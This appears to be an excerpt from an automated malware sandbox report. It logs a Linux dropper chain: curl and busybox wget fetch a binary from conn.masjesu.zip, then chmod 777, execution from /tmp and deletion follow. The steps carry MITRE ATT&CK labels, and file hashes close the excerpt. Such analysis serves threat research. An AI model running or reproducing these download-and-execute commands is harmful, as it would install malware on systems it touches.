/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵PID:1010
-
-
/bin/chmodchmod 777 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw./9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵PID:1013
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97